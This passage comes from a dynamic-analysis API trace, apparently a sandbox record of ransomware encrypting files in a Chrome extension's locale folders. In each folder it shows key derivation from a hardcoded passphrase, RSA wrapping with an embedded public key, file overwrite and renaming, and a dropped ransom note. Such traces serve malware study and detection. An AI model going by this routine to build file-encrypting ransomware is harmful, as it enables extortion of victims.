(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.gsg")) returned 1 [0250.041] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.fuck")) returned 1 [0250.042] CryptDestroyHash (hHash=0x2938978) returned 1 [0250.042] CryptDestroyKey (hKey=0x2937fb8) returned 1 [0250.042] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.042] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.042] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0250.042] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\readme_back_files.htm")) returned 0xffffffff [0250.042] AreFileApisANSI () returned 1 [0250.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.042] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.042] GetFileType (hFile=0x5d54) returned 0x1 [0250.043] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.044] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.044] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0250.045] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.045] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.045] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.045] GetLastError () returned 0x0 [0250.045] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json")) returned 0x20 [0250.045] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json", dwFileAttributes=0x80) returned 1 [0250.046] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.046] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.047] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.047] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.049] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.049] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.049] CryptHashData (hHash=0x2938978, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.049] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937fb8) returned 1 [0250.050] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.050] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.050] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2940868) returned 1 [0250.050] CryptImportPublicKeyInfo (in: hCryptProv=0x2940868, dwCertEncodingType=0x1, pInfo=0x29351d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935200*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935208*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2938038) returned 1 [0250.050] CryptEncrypt (in: hKey=0x2938038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.050] CryptEncrypt (in: hKey=0x2938038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2940a00*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2940a00*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.050] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2940a00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2940a00*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.051] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x109, lpOverlapped=0x0) returned 1 [0250.052] CryptEncrypt (in: hKey=0x2937fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x109, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.052] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.052] CloseHandle (hObject=0x5d58) returned 1 [0250.053] CloseHandle (hObject=0x5d5c) returned 1 [0250.053] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), bFailIfExists=0) returned 1 [0250.056] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json", dwFileAttributes=0x0) returned 1 [0250.057] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.gsg")) returned 1 [0250.058] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.fuck")) returned 1 [0250.059] CryptDestroyHash (hHash=0x2938978) returned 1 [0250.059] CryptDestroyKey (hKey=0x2937fb8) returned 1 [0250.059] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.059] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.059] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0250.059] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\readme_back_files.htm")) returned 0xffffffff [0250.059] AreFileApisANSI () returned 1 [0250.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.059] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.060] GetFileType (hFile=0x5d54) returned 0x1 [0250.060] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.061] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.061] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0250.061] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.062] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.062] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.062] GetLastError () returned 0x0 [0250.062] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json")) returned 0x20 [0250.062] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json", dwFileAttributes=0x80) returned 1 [0250.062] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.063] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.064] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.064] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.066] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.066] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.066] CryptHashData (hHash=0x2938978, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.066] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937d78) returned 1 [0250.066] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.066] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.066] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29390e0) returned 1 [0250.067] CryptImportPublicKeyInfo (in: hCryptProv=0x29390e0, dwCertEncodingType=0x1, pInfo=0x2934dc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934df0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934df8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937e78) returned 1 [0250.067] CryptEncrypt (in: hKey=0x2937e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.067] CryptEncrypt (in: hKey=0x2937e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29395a8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x29395a8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.067] WriteFile (in: hFile=0x5d58, lpBuffer=0x29395a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x29395a8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.068] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x103, lpOverlapped=0x0) returned 1 [0250.069] CryptEncrypt (in: hKey=0x2937d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x103, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.069] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.069] CloseHandle (hObject=0x5d5c) returned 1 [0250.069] CloseHandle (hObject=0x5d58) returned 1 [0250.069] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), bFailIfExists=0) returned 1 [0250.073] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json", dwFileAttributes=0x0) returned 1 [0250.073] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.gsg")) returned 1 [0250.074] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.fuck")) returned 1 [0250.075] CryptDestroyHash (hHash=0x2938978) returned 1 [0250.075] CryptDestroyKey (hKey=0x2937d78) returned 1 [0250.075] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.075] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.075] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0250.077] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\readme_back_files.htm")) returned 0xffffffff [0250.077] AreFileApisANSI () returned 1 [0250.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.077] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.078] GetFileType (hFile=0x5d54) returned 0x1 [0250.078] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.079] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.079] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0250.082] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.082] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.082] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.082] GetLastError () returned 0x0 [0250.082] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: 